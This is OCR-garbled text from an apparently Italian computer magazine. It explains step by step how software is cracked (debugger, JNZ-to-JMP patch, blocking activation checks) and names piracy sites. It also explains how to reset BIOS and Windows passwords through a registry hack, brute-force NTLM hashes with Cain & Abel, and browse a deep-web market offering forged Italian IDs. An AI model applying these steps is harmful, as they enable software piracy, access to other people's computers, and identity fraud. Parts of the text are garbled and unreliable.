corder, Pea/.ip o LibreOffice, solo per fare 
qualche esempio, offrono gratuitamente 
gli stessi strumenti che Photoshop, Ne¬ 
ro, WinRar o MS Office si fanno pagare 
profumatamente. Ci sono poi i regali che 
Win Magazine fa ogni mese ai suoi lettori, 
offrendo codici di attivazione e promo¬ 
zioni per utilizzare a costo zero i migliori 
software commerciali per Windows. Cosi 
come il crimine, anche i software pirata 
non pagano e possono metterci in un mare 
di guai. Farla franca con la legge non è 
difficile, ma rischiare di beccarsi un virus 
o aprire le porte del nostro PC agli stessi 
pirati che hanno crackato il software non è 
un’eventualità così rara: d'altro ime, basta 
farsi un giro sui siti che diffondi# jiick 
per essere letteralmente subiSt! 
finestre popup che segnalano la prése 
di worm, trojan e spyware di ogni tipo? 
Tirando le somme, la legalità resta sempre 
la strada migliore per non complicarsi 
inutilmente la vita. 


Con il crack fatto in cast 


Con gli 
strumenti giusti 
e un po’ di 
pratica, anche 
un pirata alle 
prime armi 
è in grado 
di crackare 
un software 
commerciale. 
E per farlo, non 
gli servono 
particolari 
competenze 
o conoscenze 
tecniche. 
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* Le armi segrete usate dal pirata 

1 


, .. pirata si procura un debugger come OllyDbg e procede all'installa- 
- ■ /ione del software che intende crackare. Avviato OllyDbg con privilegi 


di amministratore, il pirata va alla ricerca della posizione del collegamento che 
’ ^yvia il programma, quindi attende che venga caricato nel sistema. 


COSÌ I PIRATI USANO IL FIREWALL DI 


Come abbiamo visto, i pirati informatici, sfruttano 
bug, falle di sicurezza ed eseguono il reverse 
engineering dei software commerciali per rea¬ 
lizzare i cosiddetti "crack", rilasciati poi sui canali 
underground della Rete. Il più delle volte creano 
un nuovo eseguibile del programma dopo aver 
eliminato la routine di registrazione da quello 
originale; altre volte estrapolano l'algoritmo per 
compilare un keygen che consente loro di genera¬ 
re seriali accettati dalprogramma come validi. In- 
somma, la lotta tra software house e pirati è sem- 
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pre accesa; tant’è che 
le prime si impegnano 
ad introdurre sistemi 
antipirateria via via più 
sofisticati, come chiavi 
di protezione hardware 
e controlli di genuinità 
su server remoti. In par¬ 
ticolare, questi ultimi si 
eseguono all'avvio del 
software e in presenza 
di connettività Internet. 
Molte applicazioni inte¬ 
grano il controllo della 
licenza nella procedura 
di updatedel software; 
in questo modo, quan¬ 
do l'utente verifica la 
disponibilità di nuove 
versioni viene obbligo 
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toriamente controllata la genuinità del program¬ 
ma installato nel computer. 

I pirati, dopo aver applicato il crack al software, 
provvedono a bloccare nel file hosts di Windows 
XP i controlli di genuinità reindirizzando al lo¬ 
calhost del loro PC (che per tutti è 127.0.0.1 ) il 
collegamento al sito per l'attivazione dei prodotti. 
Con Windows Vista e Windows 7 tale sistema non 


funziona e devono ricorrere al firewall (anche 
quello integrato nel sistema operativo) crean¬ 
do una regola che blocca i file EXE del software 
commerciale. È così che riescono a compiere la 
loro malefatta. Insomma, ironia della sorte... uno 
strumento legale come il firewall di Windows, 
nelle mani sbagliate diventa uno strumento di 
hacking. 
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* Alla ricerca della strin 

) Il pirata procede con il filtraggio delle strlTigiraeRpÉÉivare e, scorren 
do la linestra, individua quella che riporta il testar gisfratioiuctiva- 
tiono license per poi aprirne le relative istruzioni con un doppi* 
se Quindi individua quella che si occupa di verificare la licenza. 


Non serve più nessuna attivazione 




3 In questa stringa il pirata sostituisce JNZcon JMPe riassembla il 
■•mmJ codice del software, salvando le modifiche dal menu contestuale 
che appare. Chiude quindi la finestra di debug per apportare le modifiche 
guibile originale. Il crack è bello e servito! 


RISORSE SOFTWARE, TR W/m 

È facile entrare in possesso di software pirata, ma i 
però, che sui siti pirata virus e spyware non mancar 


ILLEGALI 

:e^fe un'alternativa legale. Ricordiamo, 


SOURCEFORGE 

THE PORTARLE 
FREEWARE 
COLLECTIOM 

OIVU-'AY 

OF THE DAY 

(SUPPORTI 

DI WIN MAGAZINE 

http://source 

forge.net 

www.portable 

freeware.com 

http:// 

it.giveawayoftheday.com 

www.winmagazine.it 

Il più grande 
database di 
software open 
source esistente. Ci 
si trova di tutto e 
molti dei software 
offerti non hanno 
nulla da invidiare ai 
costosi programmi 
commerciali. 

Oltre ad essere 
completamente 
gratuiti, i software 
disponibili su 
questo sito coprono 
qualunque necessità 
senza nemmeno 
richiedere 
l'installazione 
sul sistema. 

Ogni giorno regala ai 
propri lettori le licenze 
di famosi software 
commerciali. Per non 
lasciarsi sfuggire le 
offerte, che valgono solo 
per 24 ore, e possibile 
servirsi di newsletter e 
feed RSS. 

Approfittando delle 
promozioni che ogni 
mese troviamo nei 
supporti allegati 
alla rivista, avremo 
la possibilità di 
installarew e utilizzare 
gratuitamente e 
legalmente decine 
di software a 
pagamento. 



ASTALAVISTA.BOX 

DOWNLOAD ZONE 

PORTABLEAPPZ 

ILLEGALE 

www.astalavista.box.sk 

Quello che all'apparenza 
sembra un normale motore 
di ricerca, in realtà è una 
preziosa risorsa per gli utenti 
alla ricerca di crack e keygen 
da utilizzare per 1 attivazione 
illegale di software 
commerciali. 

httpV/downloadzone 

forum.net 

Utilizzato dai pirati per 
approvvigionarsi soprattutto 
di giochi.e film, le pagine 
del forum vantano una 
ricca collezione di software 
distribuiti illegalmente 
sfruttando la velocità dei 
servizi di file hosting. 

httpy/portableappz. 

blogspot.it 

Assieme a software liberi 
modificati per l'esecuzione da 
drive USB, il blog offre decine 
di programmi commerciali 
che non richiedono né 
installazione, né tantomeno 
l'attivazione. 
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dil|o sblocca 

password 

Non riesci ad accedere al PC 
e ad avviare Windows? Così 
recuperi i dati archiviati su disco 


Cosaci O 
occorre 

TOCH. recupf.ro 

PASSWORD BIOS 

CMOSPWD 

✓co 


SOFTWARE COMPLETO 


Sito Mernei; 

www.c9security.org 

RECUPERO 
WORD WINDOWS 

ISC 

UL- 

' € 330 * 

Situ IntwriBt 

www.microsoft.it 


D 


corre 

1wcc 


DISTRIBUZIONE LINUX 

UBUNTU 11.04 

DESKTOP 

EDITION 

Sito internet 

www.ubuntu.it 

SOFTWARE DI 
BRUTE FORCE 

CAIN & ABEL 

•m ✓CD 

Sito Internet: 

www.oxió.it 


iciamoci pure la verità: l'esigenza di difen¬ 
dere a denti stretti la nostra privacy, ci ha 
costretto a ricordare a memoria decine di 
password ognuna diversa dall’altra e necessarie 
all'accesso a questo o a quel servizio. Magari, 
per aumentare il grado di sicurezza del PC, ol¬ 
tre alla classica chiave di accesso di Windows, 
ne abbiamo configurata anche una nel BIOS, 
ovviamente differente da quella del sistema 
operativo. E se in tutto ciò la nostra memoria 
non è poi cosi di ferro, abbiamo creato il giu¬ 
sto mix per rendere inutilizzabile il PC. Inizia 
proprio ora la d isperata ricerca del la password 
corretta, provando innumerevoli combinazioni 
cercare disperatamente di accedere ai nostri 
issimi file. Alle volte basta solo qualche 
r far ritornare unto alla normalità; 
ma sP^fortunasembra averci già girato le spal¬ 
le, non c’è comu nque da temere! 

Lo scova password 

Alcuni potrebbero pensare che l'unica solu¬ 
zione fattibile sia quella di procedere ad una 
secca formattazione o. nel caso di una pas¬ 
sword del BIOS, addirittura alla sostituzione 
della scheda madre! Ma, fortunatamente, 
non è così: utilizzando infatti i giusti ferri 
del mestiere, possiamo improvvisarci tec¬ 
nici informatici e scardinare qualsiasi tipo 
di protezione che blinda il nostro PC, dalla 
chiave di accesso a Windows, alla password 
del BIOS, fino ad arrivare a quella di MSN 
o di Outlook. E quando la situazione si fa 
davvero complicata, basta creare una pen- 
drive "magica" da tenere sempre a portata 
di mano, pronta ad essere inserita nel PC per 
recuperare tutti i dati più importanti. Vedia¬ 
mo dunque come procedere, analizzando 
le mosse da compiere in ogni singolo caso: 
solo così potremo risolvere i nostri problemi 
e magari dedicare un po' di tempo in più per 
allenare la nostra memoria! 
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Ecco la password del BIOS 

Una password di accesso al BIOS evita che qualcuno possa apportare modifiche al sistema. 
Ma se dovessimo dimenticarla, sarebbe impossibile accedere al PC. Ecco come recuperarla. 


^ Via la batteria! 

•| jj II metodo più semplice che permette di resettare la password 
del BIOS consiste nella rimozione della batteria inserita nella 
scheda madre. Verifichiamo dunque che il K smagrito e smontiamo 
lo sportello laterale del case. Rimuoviamo^Ì|l®VQifc alm 6 no 30 
minuti e verifichiamo che il nostro obiettivo sia staff 


• O n a 


Il giusto iumoer 

2 ? Alcune schede madri non consentono la rimozione della bai- 
_ ' teria. In questi casi possiamo procedere alla riprogrammazio- 
ne del BIOS (che cancella la password) tramite lo spostamento di un 
lumper. In questo caso, ci tocca dare uno sguardo al manuale della 
nostra motherboard per identificare il giusto ponticello 


D A t 


Master password listing 


tN» a. v«v* BBS Me** » 1» ite» ct «I «nd m ovnv» V I n ',«■*» » I 
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IN CASI ESTREMI, 
ESTREMI RIMEDIÒ 

Nel caso in cui nessuno 
dei metodi analizzati 
nel Macropasso di fianco 
consente di resettare la 
password del BIOS, cosa 
fare per cercare di re¬ 
cuperare i dati presenti 
nel nostro hard disk? 
Come ultima spiaggia, 
potremo pur sempre 
decidere di procedere 
alla sua rimozione fisica 
per inserirlo in un altro 
PC: il disco verrebbe 
riconosciuto come una 
normale unità di archi¬ 
viazione aggiuntiva e 
potremo quindi effet¬ 
tuare un backup di tutti 
i file che riteniamo più 
importanti. 


^ La password standard 

3 Molti produttori inseriscono nel BIOS la cosiddetta Master 
Password, una chiave che consente ai tecnici di accedere al 
PC bypassando eventuali chiavi di accesso impostate dagli utenti. Per 
conoscere l'elenco contenente le principali password, è sufficiente 
collegarci alla pagina Web vvww.winmagazine.it/link/795. 


C’è anche un tool... 

4 . Se il PC è già avviato, possiamo affidarci a CMOSPwd Avvia¬ 
mo il Prompt dei comandi con diritti di amministrazione e 
raggiungiamo la cartella Windows contenuta nell'archivio del softwa¬ 
re. Digitiamo ioperm -/'e premiamo invio. Digitiamo cmospwd^ wm 
A premiamo Invio e selezioniamo 2. Confermiamo con Invio 


QUANDO IL BIOS NON CEDE AGLI ATTACCHI 


Alcuni tipi di BIOS installati sulle schede madri in 
circolazione sembrano essere davvero blindati. Ma 
è tutta apparenza! Quando proprio nessun metodo 
sembra essere quello giusto per scardinare la chiave 
di accesso che proprio non riusciamo a ricordare entra 



in gioco PC CMOS Cleaner, l'utility compatibile con 
la maggior parte delle motherboard attualmente 
in commercio. Per metterlo alla prova ci basta rag¬ 
giungere il sito Web www. winmagazine.it/link/1066 
e procedere al download dell'immagine in formato 
ISO. Al termine, non ci resta che masterizzarla su un 
CD-Rom vergine (con Nero Burning Rom basta clic- 
care su Masterizzatore/Scrivi immagine e seguire 
la procedura guidata) per eseguire poi un riawio del 
PC con successivo boot dal lettore ottico. 
Dobbiamo solo sperare che l'attuale configurazione 
del BIOS consenta il boot da periferiche esterne in 
quanto, essendoci installata una password, non sarà 
possibile accedervi ed eventualmente abilitarlo. Se 
siamo dunque fortunati, non ci resta che seguire la 



semplice procedura guidata: PC CMOS Cleaner con¬ 
sente di cancellare ogni possibile password preceden¬ 
temente memorizzata riportando alle impostazioni di 
fabbrica il BIOS della nostra scheda madre. Ripristinare 
il PC sarà un vero e proprio gioco da ragazzi! 
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UN AIUTO 
DALL'ALTO 


Se la memoria non è il 
nostro punto forte, per 
evitare di eseguire il ri¬ 
pristino della password 
di Windows possiamo 
pur sempre impostare 
una domanda di aiuto 
che (i consenta di ricor¬ 
dare la chiave di accesso 
ogniqualvolta sarà 
necessario. Accediamo 
alla sezione Account 
utenti del Pannello di 
controllo di Windows e 
selezioniamo l'opzione 
Modifica posi word. 
Inseriamo quella che 
preferiamo e comple¬ 
tiamo tutti i campi, 
incluso Suggerimento 
pauword. Confermia¬ 
mo quindi con Cambia 
pauword. Qualora do¬ 
vessimo dimenticarla, 
in fasi di login al siste¬ 
ma Windows ci proporrà 
il suggerimento preim¬ 
postato per aiutarci a 
ricordarla. 


P 


1 Password nuova per l’OS 

Se la chiave di accesso al sistema operativo proprio non ci viene più in mente, non resta che 
resettarla e crearne una nuova usando un semplice tool integrato nell’OS: ecco come procedere! 




Ripristino di Windows 


^ Nel registro di sistema 
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icrosoft Wiruious tUnrsione 6.1.76001 

opyritfht <c> 2009 Microsoft Corporation. Tutti i c 

:\Winrìows\systen32>rcyedit 

:\V/induws\syctem32>net user Vincenzo qwerty 


■| Inseriamo il DVD d’installazione di Windows 1 e impostiamo 
il BIOS per eseguire il boot da questa unità (l'operazione varia 
in base al tipoOi scheda madre). Proseguiamo con la procedura gui¬ 
data come sudhjptf installare il sistema operativo. Nella finestra 
Installa selezionili wtfSfm il computer e premiamo Avanti. 


2 - Cucchiamo Prompt dei comandi e digitiamo regedit seguito 
da Invio. Attendiamo l'avvio dell'editor del registro di sistema 
e individuiamo la chiave HKEY_LOCAL MACHINE Clicchiamo su 
Carica ri/Ve presente nel menu File e selezioniamo il valore SYSTEM 
presente in C:\Windows\System32\config Confermiamo con Apn 


A HKTV.CUUiC.ftOOl 

l MWjCOMMfjUm 

4 J HUY.l0CAL.MftO*tt 
A KKMWW 
b KWOWM* 

A UM 
M HOMTb 

A VGHWAM 

A 

Jt MtfY.UWS 

A HdY.cuwedY cowt 


^ Questione d i chiavi 


jv. La nuova password 


3 Verrà creata una nuova chiave ette chiameremo reset 
Selezioniamo HKEY LOCAL MACHINE\reset\Setup e con 
un doppio clic su SetupType assegniamole il valore 2 Clicchiamo 
CmdLrne impostando cmd.exe come valore Selezioniamo HKEY_ 
LOCAL MACHINE\resetd clicchiamo Scarica Pive in File 


Riawiamo il PC e attendiamo l 'avvio del Prompt dei comandi. 

Digitiamo net i/serseguito dal nome utente e dalla password 
da impostare. Qualora lo username tosse composto da più parole, 
racchiudiamolo tra virgolette. Confermiamo con Invio e riawiamo il 
computer per verificare che tutto sia andato per il verso giusto. 


UN DISCHETTO "SALVA PASSWORD' 


Preoccupati di dimenticare la password di accesso a 
Windows? Per reagire ad un'evenienza simile possiamo 
creare un disco per reimpostare la chiave d'accesso in 
automatico. Inseriamo un floppy disk o connettiamo 
una pendrive ad una porta USB libera del computer. 
Andiamo in Account utente e facciamo clic sulla voce 
Crea un disco di reimpostazione password, nella 
barra dei menu a sinistra. Nella finestra del wizard 
che appare clicchiamo su Next 
A questo punto, selezioniamo il supporto di memoria, 
tra quelli disponibili nel menu a tendina: se abbiamo 
connesso diverse pendrive o attri supporti USB al 
computer, facciamo attenzione a selezionare quello 
giusto. Cicchiamo ancora su Next per procedere oltre. 
Digitiamo la password dell'account e clicchiamo Next, 


anche nella schermata successiva. Quindi premiamo 
Fine per terminare. Il disco “salva password"è pronto: 
teniamolo al sicuro (chiunque disponga del disco 
potrebbe accedere al nostro account) per usarlo nei 
casi di emergenza! 
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9 La chiavetta salvavita! 

Quando la password di Windows è difficile da trovare basta una mini distribuzione Linux 
installata su pendrive per recuperare tutti i nostri dati archiviati nell’hard disk. 
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Scarica Ubuntu 
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a II software fondamenta le 

■f Andiamo nella sezione Utilità&Programmazione dal CD - 
• Rom per trovare l'ultima release disponibile di Unetbootin 
e salviamo il file unetbootm.zip su disco. Questo software tra¬ 
sformerà una comune pendrive USB# ^sistema Linux avvia¬ 
bile all'occorrenza: 




a La pendrive prende forma 

3 Avviamo Unetbootin e selezioniamo l'opzione Immagine 
disco. Premiamo su Sfoglia e raggiungiamo l'immagine 
di Ubuntu che abbiamo scaricato al passo precedente. Selezio¬ 
niamo da Unità la lettera associata alla pendrive inserita nel PC e 
confermiamo con OK. Tutti i dati memorizzati nella chiavetta ver¬ 
ranno cancellati! 


h. Scegliamo l a distribuzione 

2 È il momento di scegliere quale distribuzione l inux instai- 
■ lare sulla nostra chiavetta USB. Per semplicità d'uso e sta¬ 
bilità affidiamoci ad Ubuntu Raggiungiamo quindi la pagina Web 
www.ubuntu.it e spostiamoci in Download presente nel menu Sco¬ 
pri Ubuntu. Confermiamo con un clic su Avvia Download 





lettaci 


^ L’avvio da USB 

4 - Terminata l’operazione (che può richiedere parecchi minu- 
: ti) ravviamo il PC e accediamo al BIOS (premendo Cane 
prima che appaia il logo di Windows) per impostare il boot da USB: 
l'operazione varia in base al tipo di scheda madre in uso. Non 
rimane che attendere qualche minuto prima di visualizzare l'in¬ 
terfaccia di Ubuntu. 


’ * ?! 7ED6F8B1D6F86BJJ 


File Mooìfica Visualizza Val 

Segnatibri Aiuto 

tj^ Indietro » - Avanti 

t j c # m * 

Risorse » X 

* _ File system da 268 CE 

# Vincenzo 
tt Scrivania 

LÌ File system 

■ 

BMW M3 Challenge 



-y Alla ricerca del file perduto 

Q Cicchiamo quindi su Risorse presente nella barra in alto 
e successivamente su Home per accedere al gestore file 
integrato in Ubuntu. Nella tabella a sinistra del monitor vengono 
visualizzate tutte le risorse del PC: individuiamo il nostro hard disk 
(ad esempio File System da 258 GB) e cicchiamoci su per esplo¬ 
rarne il contenuto. 


-v Copia in corso! 

g \ Raggiungiamo il percorso nel quale sono salvati tutti i 
- nostri dati più importanti tad esempio, la cartella Docu¬ 
menti o il Desktop. Selezioniamo quelli che desideriamo salva¬ 
re e con un clic destro selezioniamo l'opzione Copia. Possiamo 
quindi incollarli in una seconda pendrive o su un hard disk ester¬ 
no collegati al PC. 



LE DIMENSIONI 
CONTANO! 

Unetbootin è in grado 
di creare una perfetta 
copia live da USB di 
qualsiasi distribuzione 
Linux. Occhio, però, alle 
dimensioni: per dar vita 
ad una pendrive conte¬ 
nente Ubuntu è sempre 
bene sceglierne una che 
abbia una capacità di 
almeno 2 GB. Nei caso 
in cui fossimo disposti 
a sacrificarne una di 
dimensioni inferiori, af¬ 
fidiamoci a mini distro 
del calibro di Puppy Li¬ 
nux (www.puppyimui. 
org), che comunque 
risultano più che suffi¬ 
cienti per raggiungere il 
nostro obiettivo. Anche 
l'utilizzo è molto sem¬ 
plice, soprattutto se 
ri limitiamo ad opera¬ 
zione di copia e incolla 
di dati. 


► 
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a Quando il gioco si fa duro 

Se oltre alla password di accesso a Windows vogliamo recuperare quelle utilizzate dagli altri software installati 
nel PC, non ci rimane altro da fare che sferrare un attacco di tipo brute force con Cain & Abel. 



-k ; Installazione in corso 


^ Servono dei driver 


^ L’avvio è automatico 



0 ; Cosi facendo i driver necessari al corretto fun- 
w... J zionamento di Cain & Abel partiranno automa¬ 
ticamente ad ogni avvio di Windows. Confermiamo 
quindi con uri clic sul pulsante Instali e attendiamo 
pochi secondi che anche la procedura d'installazione 
dei driver di rete venga completata. 


' Prima di poter recuperare tutte le nostre pas- 
- » sword, installiamo sul CD-Rom il tool Cain & 
Abel Ci basta effettuare un doppio clic sul file ca_ 
setup.exe confermiamo quindi con 
seguiamo con l'installazione guidata 
sul pulsante Next 


2 Completiamo l'installazione fino a raggiungere 
il pulsante Finish Affinché Cain & Abel funzioni 
correttamente, è necessario che nel PC siano installati 
particolari driver per la scheda di rete. Verifichiamo che 
l'opzione Automatically start thè WinPcap driver at 
sia attiva. 


...» ■ 1 ll.ll.WPW.i l 


^ Si entra in azione! 

A questo punto, possiamo tinalmente awia- 
- .«v ; re Cain & Ahel. la cui esecuzione necessita 
dei privilegi di amministratore. Giochiamo dunque con 
il tasto destro del mouse sull'icona del software nel 
menu Start e selezioniamo l'opzione Esegui come 
amministratore Conferiamo con un clic su Si. 



La rete non serve 

g • Se nel nostro PC è attivo un qualsiasi firewall 
J (ad esempio quello di Windows) il software 
restituisce un messaggio che ci informa circa l'im¬ 
possibilità di utilizzare alcune funzioni integrate. Poi¬ 
ché nel nostro caso non sono necessarie, ignoriamolo 
e continuiamo criccando su OK 



± H menu è quello giusto 

g Spostiamoci dunque nella scheda Cracker 
:• (presente nell'Interfaccia principale del sof¬ 
tware) e selezioniamo uno degli elementi contraddi¬ 
stinti con il logo di Windows: per provare a recuperare 
la password di accesso al sistema operativo, selezio¬ 
niamo la voce LM & NTLM Hashes. 



Ricerca degli account 

~J Non rimane che cliccare sul pulsante + (nel 
Jf menu in alto nell'interfaccia principale di Cain 
& Abel) e selezionare l'opzione Import Hashes trom 
locai System Confermiamo con un clic sul pulsante 
Next per dare il via al nostro "attacco" baite force alla 
ricerca della password perduta. 


Quale chiave scovare? 

g Tutte le password presenti nel sistema (uten- 
ti di Windows o chiavi di accesso a softwa¬ 
re) vengono velocemente identificate da Cain & Abel 
Selezioniamo con il tasto destro del mouse quella che 
desideriamo recuperare e raggiungiamo l’opzione 
NTLM Hashes dal menu Brute-Force Attack. 


Ecco la password! 

0 I Abilitiamo l’opzione Predefined per utilizzare 
— i un classico set di caratteri alfanumerici. Nella 
sezione Password L enght impostiamo poi la lunghez¬ 
za minima e massima della password ed avviamo il 
processo con un clic su Start non ci resta che atten¬ 
dere il verdetto finale! ■ 
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CREA IL TUO SITO WEB IN 5 PASSI CON WEBSITE X5 




CREA SITI WEB, BLOG E NEGOZI 

Semplice da usare, professionale nei risultati 

✓ Nessuna conoscenza di programmazione richiesta 

✓ Crea tutti i siti che vuoi con pagine illimitate 
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Ideale per chiunque 

^ Piccole e medie imprese 
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✓ Associazioni e club 
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✓ Privati e appassionati 
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Esiste una Rete segreta dove 
circolano film, documenti riservati, 
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L a parola d’ordine è semplicità. Con la sem¬ 
plicità e la curiosità possiamo affrontare 
qualunque argomento e addentrarci in 
questioni anche spinose, come il famigerato 
Deep Web, che ha scatenato la fantasia di tanti 
internauti, iniziamo a capire innanzitutto di 
cosa stiamo parlando. La traduzione italiana 
sarebbe Web profondo, che rimanda ad im¬ 
magini inquietanti I n parte è vero, ma non del 
tutto. Traduciamo invece l'espressione Deep 
Web con Web sommerso e spieghiamo subito 
come funziona, il Webcosicomcsiamoabituati 
a conoscerlo viene indicizzato dai motori di 
ricerca che ci mostrano i siti in base alle parole 
tfjjave delle nostre ricerche: questo èquello che 
piamo, che ci è stato insegnato. Ma questo 
[Web”, ne è solo uqp parte. Ci sono pa¬ 
loni che non vengono indicizzate, 
perctCTrloro è impedito l’accesso dei motori di 
ricerca, pur essendo pagine pubbliche. Prima 
di gridare allo scandalo, pensiamo una cosa 
semplice: ci farebbe piacere se un motore di ri¬ 
cerca indicizzasse e restituisse come risultato di 
una ricerca la nostra paginadi posta o la nostra 
cronologia delle conversazioni su Skype? Ecco, 
appunto.Tutte queste pagine, di posta, di chat, 
molti forum, comunicazioni interne aziendali, 
ma anche quelle protette da una password o i 
database scientifici e persino tutte le situazioni 
Internet create per i cellulari, si muovono nel 
Deep Web. Adesso suona meno sinistro, vero? 
È semplicemente logico che alcu ne pagine non 
debbano essere ind icizzate. Sono private! Que¬ 
sto non significa, però, che il Deep Web sia un 
mondo perfetto. Esattamente come nel Web che 
conosciamo, anche qui abbiamo una trasposi¬ 
zione della realtà in cui viviamo, quindici sono 
i buoni e i cattivi. I cattivi si trovano qui perché 
costruiscono i loro siti impedendo ai motori 
di ricerca di indicizzarli e non perché il Deep 
Weebsia la loro sede naturale. Il Deep Webèsolo 
Deep Web. Per semplificare la comprensione di 
cosa sia in effetti questo Deep Web possiamo 


noi nella 
invisibile 
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L’Hidden Wiki è il punto di partenza da cui cominciare le navigazioni nel Deep Web. 


pensare ad un grosso iceberg, di cui solo una 
piccola parte risulta visibile (circa un terzo); la 
parte rimanenteèsommersa(Deep, appunto). 
Qui dimorano i database delle biblioteche, le 
pagine con password e insomma tjfcto ciò di 
cui abbiamo accennato sopra. La 
visibilità dipende Hai fatto che è necess 
maggiore protezione di questi dati, accessi!! 
solo a persone autorizzate. I media ultimamente 
hanno un po' troppo demonizzato il Deep Web, 
trattandolocomeun luogo sordido eillegale. Per 
la maggioranza dei casi non è cosi, ma vedremo 
come purtroppo, proprio per la maggiore effi¬ 
cienza di questa parte della Rete nel trattare 
la riservatezza, è proprio qui che alcuni filoni 
i Regali si sono sistemati con i loro siti. E lo hanno 
fatto alla grande! 

Come ci si immerge? 

Accedere alla rete sommersa non è immediato, 
ma nemmeno complicatissimo. Innanzitutto, 
visto che il Deep Web si basa sulla tutela della 
privacy, è fondamentale navigare in anonimato. 
Quando ci muoviamo su Internet, lasciamo 
una serie di informazioni in giro. Queste in¬ 


formazioni possono essere raggruppate i n due 
categorie: le informazioni inserite da noi stessi, 
come i dati sul Web, i testi delle c-mail e così 
via e poi le informazioni indirette, quelle cioè 
che vengono lasciate in automatico ad ogni 
nostro movimento. Tali informazioni sono per 
tempio il nostro indirizzo IP, che permette di 
Lizzare geograficamente il computer (ed 
cubato perché la pubblicità che trovia¬ 
mo nei ^i<É||%|isiiiamo quotidianamente è 
così "vicintH^c^nWo#ser che utilizziamo 
e in che lingua, ra^^Matfthe e i cookie, la 
cronologia e poi ancora le icerd^^ieAcciamo 
su Internet, file teniporawiCilfitJm^iità. 
Inutile dire che un utilizzatore intuir » d i 
poter non ha le conoscenze tecniche pctagirr 
personalmentee cancellalo rendere anon im# 
tutti i dati; ma il problema non si pone, perché 
basta installare Win Web Explorer, il browser 
personalizzato Win Magazine, e il gioco è fatto. 
Non solo, vedremo anche come, grazie alla no¬ 
stra personalizzazione, sarà facile sia accedere 
al Deep Web sia compiere operazioni come 
il salvataggio dei Preferiti in tutta sicurezza. 
Una volta estratto e installato il programma 


sul computer, avviandolo si apre una finestra 
particolaredi Firefox, riconoscibile dal logo blu. 
Per navigare in anonimato i passi da compiere 
sono due: clicchiamo sull’icona X che si trova 
nella barra di stato e poi sulla voce Attive. 

Gli indirizzi del Deep Web 

Da questo momento siamo anonimi sul Web! 
Per una maggiore sicurezza, possiamo abilitare 
anche l’opzione Stealth e i mi icare uno dei Paesi 
presenti nella lista Countriesdal quale simule¬ 
remo il nostro collegamento alla Rete. Sarà così 
impossibile risalirea noi! Fin qui, però, abbiamo 
solo resoanonima la navigazione, ma non siamo 
ancora dentro la parte sommersa del Web. La 
difficoltà maggiore che abbiamo, anche adesso 
che siamo "dentro", è come accedere ai siti e 
alle pagine che dimorano sul Deep Web. Non 
si tratta solo di non conoscere gli indirizzi, ma 
anche e soprattutto di avere i n questo caso una 
struttura di indirizzi completamente di versa da 
quella cui siamo abituati. 

Un indirizzo deep, infatti, ha una struttura si¬ 
mile a J2Wgs5H5Uci&dìP=5.onlon. Ci viene 
in aiuto la Uidden Wiki, che ci fornisce una 
catalogazione di siti della rete Tor, che sono 
appunto quegli indirizzi che hanno estensione 
.onion. l 'indirizzo della Uidden Wiki è wwvv. 
winmagazine.it/link/1959.lsitisonocatalogati 
per tipologia e sulla destra abbiamo una barra 
laterale che ci permette una facile consulta¬ 
zione di tutte le categorie. Dando un'occhiata 
veloce, vediamo che ci sono molte categorie, più 
> meno legittime, che spaziano da siti per il file 
ifiamu^uiiarket. molti forum, fino ad arrivare 
pWu^P^tnenti piti precisi come d roga, sesso 
earmì^kiiziamo la nostra gita in questo mondo 
partendo dalla sezione Inlroduclion Pointcbe 
ci mette a disposizione alcuni motori di ricerca 
specifici perii Deep Web. Il nostro amato lioogle 
qui non potrebbe fare molto per noi! Proviamo 
a caricare TORDIR, cliccando sul link che tro¬ 
viamo nella sezione. In questo sito troviamo 



ANONIMI NEL DEEP WEB CON TOR 


Con il termineTor, acronimo di The Onion maniera del tutto automatica. Dopodiché 
Routers, ci si riferisce ad una rete basata i dati stessi vengono fatti transitare attra- 
su nodi di comunicazione chiamati relay verso un altro circuito anonimo. Questi 
che altro non sono se non server inter- tipi di server, chiamati anche Onion rou- 
mediari attraverso i quali viaggiano i dati ters (il termine onion ricorda i veli di una 
prima di arrivare a destinazione. I relay cipolla...), non sono altro che proxy che 
possono essere i nostri stessi computer: utilizzano il protocollo di trasmissione 
infatti possiamo autorizzare il network a Socks4A. In questo modo i siti Web non 
trasformare il nostro PC in un server Tor. capiscono da dove ricevono una richiesta. 
I dati prima di arrivare al server del sito Inoltre, tutti i dati scambiati tra i server 
Web richiesto passano in questi nodi in sono crittografati per impedirne la lettura, 
maniera casuale ed utilizzando sempre Come conseguenza negativa abbiamo un 
un percorso differente. La rete modifica rallentamento della navigazione, però ci 
il tragitto dei dati ogni dieci minuti e in si guadagna in sicurezza. 










L’ipermercato virtuale è aperto 

Ecco come funziona il Black Market, dove è possibile acquistare documenti falsi, licenze software, film in 
DVD e chi più ne ha più ne metta! Con particolare attenzione alle truffe, perché l'inganno è dietro l'angolo... 





*\ WinWeb Explorer è pronto! 

1 Scompattiamo l'archivio WinWebExplorer 

.... zip (presente sul CD-Rom) e installiamo 

del Drowser eseguendo il (ile EXE Seguimela pro¬ 
cedura guidata e, quando richiesto, ciuciar 
metti questa installazione per attivare i vaflpiu 
Quindi clicchiamo Fine 



|. 


▲ Iscriviamoci al mercato 

2 Caricato il sito del Black Market, clicchia¬ 
mo Register. Niente paura però, perché 
non dovremo inserire alcun dato sensibile. Basta 
una password e uno usemame e stabilire, ciccando 
menu a tendina, che tipo di registrazione effet- 
ila come compratore è totalmente gratuita. 



Effettuiamo il looin 

J Per il completamento della registrazione cre- 
... iamo una seconda password che serve per 
prelevare denaro dal nostro conto. Al termine, tor¬ 
niamo alla pagina di login ed effettuiamo l'accesso 
al market, Inseriamo lo usemame e la password ed 
evitiamo di spuntare la casella Remember me. 



Tante categorie 

^ , Le categone merceologiche sono sulla sini- 
: stia, mentre nella home page c'è una carrel¬ 
lata di prodotti. Quando clicchiamo su una categoria 
si apre una finestra cdn le sottocategorie. Se siamo 
interessati ad una in particolare, cicchiamoci sopra 
per entrare nella sezione dedicata. 


Proviamo i documenti 

. Una categoria è quella dei documenti È faci- 
-—- le che qualcuno voglia cambiare Identità, o 
gli serva una patente falsa, no? Qui si compra tutto. 
Scorrendo la lista di documenti disponibili, troviamo 
che tutto il mondo è coperto. Cicchiamo sulla paten¬ 
te italiana e vediamo l'offerta. 


^ Che servizio efficiente! 

g II venditore ci informa che può creare docu- 
J menti di tutti i tipi, basta che siano su tesse¬ 
rino in PVC. Via libera quindi a codici fiscali, patenti, 
carte di identità. Per il momento spedisce solo in Ita¬ 
lia e il costo è lo stesso per ogni tipo di documento, 
cioè 400 euro o 43.75344 Bitcoin. 


